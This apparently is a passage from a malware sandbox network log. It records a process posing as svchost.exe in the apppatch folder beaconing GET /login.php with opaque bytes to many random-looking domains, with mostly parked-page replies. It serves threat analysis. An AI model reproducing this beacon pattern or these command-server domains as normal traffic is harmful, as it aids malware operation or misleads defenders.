20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED] Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.4	56389	199.191.50.83	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:58.787022114 CEST	306	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: galyqaz.com Content-Length: 6 Cookie: vsid=926vr471977221402211128 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:49:00.831562996 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 23 Aug 2024 16:48:59 GMT Server: Apache Referrer-Policy: no-referrer-when-downgrade Accept-CH: Sec-CH-Save-Data, Sec-CH-DPR, Sec-CH-Width, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Device-Memory, Sec-CH-RTT, Sec-CH-Downlink, Sec-CH-ECT, Sec-CH-Prefers-Color-Scheme, Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version Permissions-Policy: ch-ua-platform-version=("https://dts.gnpge.com"), ch-ua-model=("https://dts.gnpge.com") X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAKX74ixpzVyXbJprcLfbH4psP4+L2entqri0lzh6pkAaXLPIcclv6DQBeJJjGFWrBIF6QMyFwXT5CCRyjS2penECAwEAAQ==_NHOnw0G73BscnvIcyf8HaXYxUwB52N5y4R2rV77ldfg6F/P3HTMIgnr4aIPWR/fyPGslgb3huQzNdSH/7sK+hw== Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 61 37 63 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 65 6c 69 76 65 72 79 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 63 6f 6e 73 65 6e 74 6d 61 6e 61 67 65 72 2e 6e 65 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 74 61 79 69 6e 69 66 72 61 6d 65 20 3d 20 31 3b 20 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 6f 6e 74 6c 6f 61 64 69 6e 69 66 72 61 6d 65 20 3d 20 74 72 75 65 3b 20 69 66 28 [TRUNCATED] Data Ascii: a7cd<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><link rel="preconnect" href="https://delivery.consentmanager.net"> <link rel="preconnect" href="https://cdn.consentmanager.net"> <script>window.cmp_stayiniframe = 1; window.cmp_dontloadiniframe = true; if(!"gdprAppliesGlobally" in window){window.gdprAppliesGlobally=true}i
Aug 23, 2024 18:49:00.832968950 CEST	1236	IN	Data Raw: 66 28 21 28 22 63 6d 70 5f 69 64 22 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3c 31 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 69 64 3d 30 7d 69 66 28 21 28 22 63 6d 70 5f 63 64 69 64 22 20 69 6e 20 77 69 6e 64 6f Data Ascii: f(!("cmp_id" in window)\|\|window.cmp_id<1){window.cmp_id=0}if(!("cmp_cdid" in window)){window.cmp_cdid="21fdca2281833"}if(!("cmp_params" in window)){window.cmp_params=""}if(!("cmp_host" in window)){window.cmp_host="a.delivery.consentmanager.net
Aug 23, 2024 18:49:00.832982063 CEST	1236	IN	Data Raw: 65 64 4c 61 6e 67 73 28 29 3b 76 61 72 20 63 3d 5b 5d 3b 76 61 72 20 66 3d 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 3b 76 61 72 20 65 3d 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 3b 76 61 72 20 61 3d 22 6c 61 6e 67 75 61 67 65 73 22 20 69 6e 20 Data Ascii: edLangs();var c=[];var f=location.hash;var e=location.search;var a="languages" in navigator?navigator.languages:[];if(f.indexOf("cmplang=")!=-1){c.push(f.substr(f.indexOf("cmplang=")+8,2).toUpperCase())}else{if(e.indexOf("cmplang=")!=-1){c.pus
Aug 23, 2024 18:49:00.838660955 CEST	1236	IN	Data Raw: 3d 22 22 3b 69 2b 3d 22 3d 22 3b 76 61 72 20 73 3d 69 2e 6c 65 6e 67 74 68 3b 76 61 72 20 64 3d 6c 6f 63 61 74 69 6f 6e 3b 69 66 28 64 2e 68 61 73 68 2e 69 6e 64 65 78 4f 66 28 69 29 21 3d 2d 31 29 7b 77 3d 64 2e 68 61 73 68 2e 73 75 62 73 74 72 Data Ascii: ="";i+="=";var s=i.length;var d=location;if(d.hash.indexOf(i)!=-1){w=d.hash.substr(d.hash.indexOf(i)+s,9999)}else{if(d.search.indexOf(i)!=-1){w=d.search.substr(d.search.indexOf(i)+s,9999)}else{return e}}if(w.indexOf("&")!=-1){w=w.substr(0,w.in
Aug 23, 2024 18:49:00.838679075 CEST	896	IN	Data Raw: 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 29 7b 75 2e 63 75 72 72 65 6e 74 53 63 72 69 70 74 2e 70 61 72 65 6e 74 45 6c 65 6d 65 6e 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 6a 29 7d 65 6c 73 65 7b 69 66 28 75 2e Data Ascii: rrentScript.parentElement){u.currentScript.parentElement.appendChild(j)}else{if(u.body){u.body.appendChild(j)}else{var t=v("body");if(t.length==0){t=v("div")}if(t.length==0){t=v("span")}if(t.length==0){t=v("ins")}if(t.length==0){t=v("script")}
Aug 23, 2024 18:49:00.844976902 CEST	1236	IN	Data Raw: 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 69 6e 73 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 73 63 72 69 70 74 22 29 7d 69 66 28 74 2e 6c 65 6e 67 74 68 3d 3d 30 29 7b 74 3d 76 28 22 68 65 61 64 22 29 7d 69 66 Data Ascii: length==0){t=v("ins")}if(t.length==0){t=v("script")}if(t.length==0){t=v("head")}if(t.length>0){t[0].appendChild(j)}}}})();window.cmp_addFrame=function(b){if(!window.frames[b]){if(document.body){var a=document.createElement("iframe");a.style.cs
Aug 23, 2024 18:49:00.844990969 CEST	1236	IN	Data Raw: 2c 63 6d 70 49 64 3a 33 31 7d 2c 74 72 75 65 29 7d 65 6c 73 65 7b 61 5b 32 5d 28 66 61 6c 73 65 2c 74 72 75 65 29 7d 7d 65 6c 73 65 7b 69 66 28 61 5b 30 5d 3d 3d 3d 22 67 65 74 55 53 50 44 61 74 61 22 29 7b 61 5b 32 5d 28 7b 76 65 72 73 69 6f 6e Data Ascii: ,cmpId:31},true)}else{a[2](false,true)}}else{if(a[0]==="getUSPData"){a[2]({version:1,uspString:window.cmp_rc("")},true)}else{if(a[0]==="getTCData"){__cmp.a.push([].slice.apply(a))}else{if(a[0]==="addEventListener"\|\|a[0]==="removeEventListener"
Aug 23, 2024 18:49:00.851492882 CEST	1236	IN	Data Raw: 67 70 70 5f 70 69 6e 67 28 29 7d 7d 65 6c 73 65 7b 69 66 28 67 3d 3d 3d 22 67 65 74 47 50 50 44 61 74 61 22 29 7b 72 65 74 75 72 6e 7b 73 65 63 74 69 6f 6e 49 64 3a 33 2c 67 70 70 56 65 72 73 69 6f 6e 3a 31 2c 73 65 63 74 69 6f 6e 4c 69 73 74 3a Data Ascii: gpp_ping()}}else{if(g==="getGPPData"){return{sectionId:3,gppVersion:1,sectionList:[],applicableSections:[0],gppString:"",pingData:window.cmp_gpp_ping()}}else{if(g==="hasSection"\|\|g==="getSection"\|\|g==="getField"){return null}else{__gpp.q.push(
Aug 23, 2024 18:49:00.851505995 CEST	1236	IN	Data Raw: 67 70 70 52 65 74 75 72 6e 3a 7b 72 65 74 75 72 6e 56 61 6c 75 65 3a 68 2c 73 75 63 63 65 73 73 3a 67 2c 63 61 6c 6c 49 64 3a 62 2e 63 61 6c 6c 49 64 7d 7d 3b 64 2e 73 6f 75 72 63 65 2e 70 6f 73 74 4d 65 73 73 61 67 65 28 61 3f 4a 53 4f 4e 2e 73 Data Ascii: gppReturn:{returnValue:h,success:g,callId:b.callId}};d.source.postMessage(a?JSON.stringify(e):e,"*")},"parameter" in b?b.parameter:null,"version" in b?b.version:1)}};window.cmp_setStub=function(a){if(!(a in window)\|\|(typeof(window[a])!=="funct
Aug 23, 2024 18:49:00.851519108 CEST	896	IN	Data Raw: 20 69 6e 20 77 69 6e 64 6f 77 29 7c 7c 21 77 69 6e 64 6f 77 2e 63 6d 70 5f 64 69 73 61 62 6c 65 75 73 70 29 7b 77 69 6e 64 6f 77 2e 63 6d 70 5f 73 65 74 53 74 75 62 28 22 5f 5f 75 73 70 61 70 69 22 29 7d 69 66 28 21 28 22 63 6d 70 5f 64 69 73 61 Data Ascii: in window)\|\|!window.cmp_disableusp){window.cmp_setStub("__uspapi")}if(!("cmp_disablegpp" in window)\|\|!window.cmp_disablegpp){window.cmp_setGppStub("__gpp")};</script><script type="text/javascript">var abp;</script><script type="text/javascrip
Aug 23, 2024 18:49:00.855628014 CEST	1236	IN	Data Raw: 72 29 7b 7d 7d 3c 2f 73 63 72 69 70 74 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 69 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 61 3d 27 32 39 35 39 31 27 20 62 3d 27 33 33 35 34 39 27 20 63 3d 27 67 61 6c 79 71 61 7a 2e 63 6f 6d 27 20 64 3d 27 65 6e Data Ascii: r){}}</script><meta name="tids" content="a='29591' b='33549' c='galyqaz.com' d='entity_mapped'" /><title>Galyqaz.com</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-widt

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.4	56390	44.221.84.105	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:58.795012951 CEST	374	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vocyzit.com Content-Length: 6 Cookie: btst=3e0cadd8e2dc2fdcf92b9c2073c70c58\|8.46.123.33\|1724431671\|1724431621\|25\|2\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:59.339868069 CEST	333	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:48:59 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=3e0cadd8e2dc2fdcf92b9c2073c70c58\|8.46.123.33\|1724431739\|1724431621\|46\|3\|0; path=/; domain=.vocyzit.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.4	56391	172.234.222.143	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:58.818416119 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.4	56392	3.94.10.34	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:58.899947882 CEST	374	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lymyxid.com Content-Length: 6 Cookie: btst=162891e75d1d854fb9d05e52998b5935\|8.46.123.33\|1724431672\|1724431621\|25\|2\|0; snkz=8.46.123.33 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:59.438848972 CEST	333	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 23 Aug 2024 16:48:59 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Set-Cookie: btst=162891e75d1d854fb9d05e52998b5935\|8.46.123.33\|1724431739\|1724431621\|46\|3\|0; path=/; domain=.lymyxid.com; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax; Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.4	56393	69.162.80.58	80

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:59.133737087 CEST	318	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: lysyfyj.com Content-Length: 6 Cookie: sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:48:59.720093966 CEST	772	IN	HTTP/1.1 200 OK accept-ch: Sec-CH-UA, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version, Sec-CH-UA-Mobile cache-control: max-age=0, private, must-revalidate connection: close content-length: 481 content-type: text/html; charset=utf-8 date: Fri, 23 Aug 2024 16:48:59 GMT server: nginx Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4c 6f 61 64 69 6e 67 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 27 68 74 74 70 3a 2f 2f 6c 79 73 79 66 79 6a 2e 63 6f 6d 2f 6c 6f 67 69 6e 2e 70 68 70 3f 63 68 3d 31 26 6a 73 3d 65 79 4a 68 62 47 63 69 4f 69 4a 49 55 7a 49 31 4e 69 49 73 49 6e 52 35 63 43 49 36 49 6b 70 58 56 43 4a 39 2e 65 79 4a 68 64 57 51 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 56 34 63 43 49 36 4d 54 63 79 4e 44 51 7a 4f 44 6b 7a 4f 53 77 69 61 57 46 30 49 6a 6f 78 4e 7a 49 30 4e 44 4d 78 4e 7a 4d 35 4c 43 4a 70 63 33 4d 69 4f 69 4a 4b 62 32 74 6c 62 69 49 73 49 6d 70 7a 49 6a 6f 78 4c 43 4a 71 64 47 6b 69 4f 69 49 79 64 6d 34 32 61 6a 46 32 4d 57 6b 34 62 47 52 75 5a 47 46 30 4d 57 63 77 59 6d 4e 78 4e 44 63 69 4c 43 4a 75 59 6d 59 69 4f 6a 45 33 4d 6a 51 30 4d 7a 45 33 4d 7a [TRUNCATED] Data Ascii: <html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('http://lysyfyj.com/login.php?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNDQzODkzOSwiaWF0IjoxNzI0NDMxNzM5LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydm42ajF2MWk4bGRuZGF0MWcwYmNxNDciLCJuYmYiOjE3MjQ0MzE3MzksInRzIjoxNzI0NDMxNzM5NjU1MzU3fQ.93jHNDe653NfZkCJsNnTuXM0ey0AS4uxh9LM4mPx99U&sid=5243bebf-616f-11ef-adb1-e1f00ce9ce88');</script></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
78	192.168.2.4	56394	85.17.31.122	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:59.355257988 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
79	192.168.2.4	56395	172.234.222.143	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:59.373905897 CEST	268	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: vojyqem.com Content-Length: 6 Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
80	192.168.2.4	56396	91.195.240.19	80	6720	C:\Windows\apppatch\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Aug 23, 2024 18:48:59.382220030 CEST	277	OUT	GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: www.gahyqah.com Connection: Keep-Alive Data Raw: 9e 84 b5 e8 71 28 Data Ascii: q(
Aug 23, 2024 18:49:00.092837095 CEST	1236	IN	HTTP/1.1 200 OK date: Fri, 23 Aug 2024 16:48:59 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked vary: Accept-Encoding expires: Mon, 26 Jul 1997 05:00:00 GMT cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 pragma: no-cache x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA== last-modified: Fri, 23 Aug 2024 16:48:59 GMT x-cache-miss-from: parking-89b87dbbb-pdp8m server: Parking/1.0 Data Raw: 38 35 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 67 35 72 6c 58 73 39 52 75 52 57 34 64 67 6c 71 51 35 4c 79 64 4a 45 74 74 53 54 56 42 73 66 70 54 67 35 59 62 54 62 54 67 78 51 79 43 78 4a 61 58 2f 34 77 57 7a 74 49 41 4f 75 52 6c 32 79 56 59 68 58 30 57 47 46 31 59 61 65 77 33 55 38 35 6e 47 49 35 75 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 67 61 68 79 71 61 68 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 67 61 68 79 71 61 68 20 [TRUNCATED] Data Ascii: 859<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_g5rlXs9RuRW4dglqQ5LydJEttSTVBsfpTg5YbTbTgxQyCxJaX/4wWztIAOuRl2yVYhX0WGF1Yaew3U85nGI5uA==><head><meta charset="utf-8"><title>gahyqah.com - gahyqah Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="gahyqah.com is your first and best source for all of the information youre looking for. From ge
Aug 23, 2024 18:49:00.094475031 CEST	1236	IN	Data Raw: 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 67 61 68 79 71 61 68 2e 63 6f 6d 20 68 61 73 20 69 74 20 61 6c 6c Data Ascii: neral topics to more of what you would expect to find here, gahyqah.com has it all. We hope you find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templates/logos/sedo_logo.p
Aug 23, 2024 18:49:00.094486952 CEST	1236	IN	Data Raw: 73 74 79 6c 65 3a 6e 6f 6e 65 7d 73 76 67 3a 6e 6f 74 28 3a 72 6f 6f 74 29 7b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 2c 6f 70 74 67 72 6f 75 70 2c 73 65 6c 65 63 74 2c 74 65 78 74 61 72 65 61 7b 66 6f Data Ascii: style:none}svg:not(:root){overflow:hidden}button,input,optgroup,select,textarea{font-family:sans-serif;font-size:100%;line-height:1.15;margin:0}button,input{overflow:visible}button,select{text-transform:none}button,html [type=button],[type=res
Aug 23, 2024 18:49:00.102341890 CEST	1236	IN	Data Raw: 2d 69 74 65 6d 7d 63 61 6e 76 61 73 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 7d 74 65 6d 70 6c 61 74 65 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 5b 68 69 64 64 65 6e 5d 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 2e 61 6e 6e Data Ascii: -item}canvas{display:inline-block}template{display:none}[hidden]{display:none}.announcement{background:#0e162e;text-align:center;padding:0 5px}.announcement p{color:#848484}.announcement a{color:#848484}.container-header{margin:0 auto 0 auto;t
Aug 23, 2024 18:49:00.102353096 CEST	1236	IN	Data Raw: 74 61 69 6e 65 72 2d 64 69 73 63 6c 61 69 6d 65 72 20 61 7b 63 6f 6c 6f 72 3a 23 39 34 39 34 39 34 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 69 6d 70 72 69 6e 74 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d Data Ascii: tainer-disclaimer a{color:#949494}.container-imprint{text-align:center}.container-imprint__content{display:inline-block}.container-imprint__content-text,.container-imprint__content-link{font-size:10px;color:#949494}.container-contact-us{text-a
Aug 23, 2024 18:49:00.110156059 CEST	801	IN	Data Raw: 6f 6e 74 2d 73 69 7a 65 3a 6c 61 72 67 65 72 7d 2e 63 6f 6e 74 61 69 6e 65 72 2d 63 6f 6f 6b 69 65 2d 6d 65 73 73 61 67 65 20 61 7b 63 6f 6c 6f 72 3a 23 66 66 66 7d 2e 63 6f 6f 6b 69 65 2d 6d 6f 64 61 6c 2d 77 69 6e 64 6f 77 7b 70 6f 73 69 74 69 Data Ascii: ont-size:larger}.container-cookie-message a{color:#fff}.cookie-modal-window{position:fixed;background-color:rgba(200,200,200,.75);top:0;right:0;bottom:0;left:0;-webkit-transition:all .3s;-moz-transition:all .3s;transition:all .3s;text-align:ce
Aug 23, 2024 18:49:00.110168934 CEST	1236	IN	Data Raw: 31 42 34 45 0d 0a 7d 2e 62 74 6e 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 73 6f 6c 69 64 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 35 70 78 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 Data Ascii: 1B4E}.btn{display:inline-block;border-style:solid;border-radius:5px;padding:15px 25px;text-align:center;text-decoration:none;cursor:pointer;margin:5px;transition:.3s}.btn--success{background-color:#218838;border-color:#218838;color:#fff;font
Aug 23, 2024 18:49:00.117014885 CEST	1236	IN	Data Raw: 70 78 3b 77 69 64 74 68 3a 32 36 70 78 3b 6c 65 66 74 3a 34 70 78 3b 62 6f 74 74 6f 6d 3a 34 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 69 74 69 6f 6e 3a 2e 34 73 3b 74 72 61 Data Ascii: px;width:26px;left:4px;bottom:4px;background-color:#fff;-webkit-transition:.4s;transition:.4s}.switch__slider--round{border-radius:34px}.switch__slider--round:before{border-radius:50%}input:checked+.switch__slider{background-color:#007bff}inpu
Aug 23, 2024 18:49:00.117027044 CEST	1236	IN	Data Raw: 69 6e 65 72 2d 63 6f 6e 74 65 6e 74 5f 5f 6c 65 66 74 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 2f 2f 69 6d 67 2e 73 65 64 6f 70 61 72 6b 69 6e 67 2e 63 6f 6d 2f 74 65 6d 70 6c 61 74 65 73 2f 62 67 2f 61 72 72 6f 77 73 2d 63 75 72 76 65 Data Ascii: iner-content__left{background:url("//img.sedoparking.com/templates/bg/arrows-curved.png") #0e162e no-repeat center left;background-size:94% 640px;flex-grow:2;z-index:-1;top:50px;position:inherit}.container-content__right{background:url("//img.
Aug 23, 2024 18:49:00.117038012 CEST	1236	IN	Data Raw: 64 73 2e 67 69 66 22 29 3b 66 6c 6f 61 74 3a 6c 65 66 74 3b 70 61 64 64 69 6e 67 2d 74 6f 70 3a 33 32 70 78 7d 2e 74 77 6f 2d 74 69 65 72 2d 61 64 73 2d 6c 69 73 74 5f 5f 6c 69 73 74 2d 65 6c 65 6d 65 6e 74 2d 63 6f 6e 74 65 6e 74 7b 64 69 73 70 Data Ascii: ds.gif");float:left;padding-top:32px}.two-tier-ads-list__list-element-content{display:inline-block}.two-tier-ads-list__list-element-header-link{font-size:37px;font-weight:bold;text-decoration:underline;color:#9fd801}.two-tier-ads-list__list-el
